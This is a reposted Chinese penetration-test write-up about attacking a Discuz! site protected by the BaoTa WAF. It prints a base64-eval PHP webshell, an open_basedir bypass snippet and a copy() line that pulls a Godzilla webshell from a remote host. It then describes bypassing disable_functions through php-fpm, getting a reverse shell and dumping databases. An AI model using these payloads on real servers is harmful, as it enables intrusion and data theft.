一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

admin 2022年3月18日00:40:42评论441 views字数 1397阅读4分39秒阅读模式

这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝塔WAF


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试



发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了

网上有通杀payload,写shell的过程在这里省略了

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


由于网站存在宝塔WAF ,写入shell 必须变形一下,将命令进行base64编码在传进去

<?php @eval(base64_decode($_POST['1111']));?>


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

在phpinfo()里可以看到,宝塔默认会设置 open_basedir 以及 disable_functions,导致蚁剑的shell直接连接之后不大好用,命令执行不了

绕过 open_basedir 查看文件

利用 ini_set() 来 bypass open_basedir 来获取路径名和目录内容,base64 编码之后执行,发现宝塔目录下还有其他站点目录

eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');c


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

哥斯拉管理webshell

为了方便查看文件 ,使用哥斯拉马,加密器选择PHP_EVAL_XOR_BASE64,用copy命令传到服务器中,这样流量就可以不会被宝塔waf拦截了

copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


哥斯拉马可以自动实现bypass openbase_dir ,读取数据库 用户名密码,可以更改管理员用户进后台或者脱库


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


过 disable_functions 执行命令

disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函数,环境是php5.6,导致很多常规bypass的方法都用不了

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

网站是使用 nginx+php5.6 ,用攻击 php-fpm的办法来bypass,攻击原理可以看 参考链接

先找到php-fpm的配置 如:/www/server/php/56/etc/php-fpm.conf

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


或者看nginx的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试



首先 选择 PAttackFPM 将模块加载并执行


一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


再利用哥斯拉马中 bypass disable_functions 的模块 ,成功执行命令

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

获取反弹 shell ,可以进一步尝试对主机进行提权了

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试


参考文章:

https://xz.aliyun.com/t/9295

https://blog.csdn.net/qq_38154820/article/details/106330106


论坛邀请码

请各位师父,多多发表文章,论坛会固定清理不活跃用户https://www.cnsuc.net/user-create.htm (论坛注册地址)F5168747341973A5A362F81046EB74A8F5A3A9E940DB702351FD6E94ADF3

来源:先知

注:如有侵权请联系删除



一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

欢迎大家加群一起讨论学习和交流
(此群已满200人,需要添加群主邀请)

一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

从业精于勤而荒于嬉,

行成于思而毁于随。

原文始发于微信公众号(衡阳信安):一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月18日00:40:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次利用哥斯拉马绕过宝塔waf及disable_functions的渗透测试https://cn-sec.com/archives/831445.html

发表评论

匿名网友 填写信息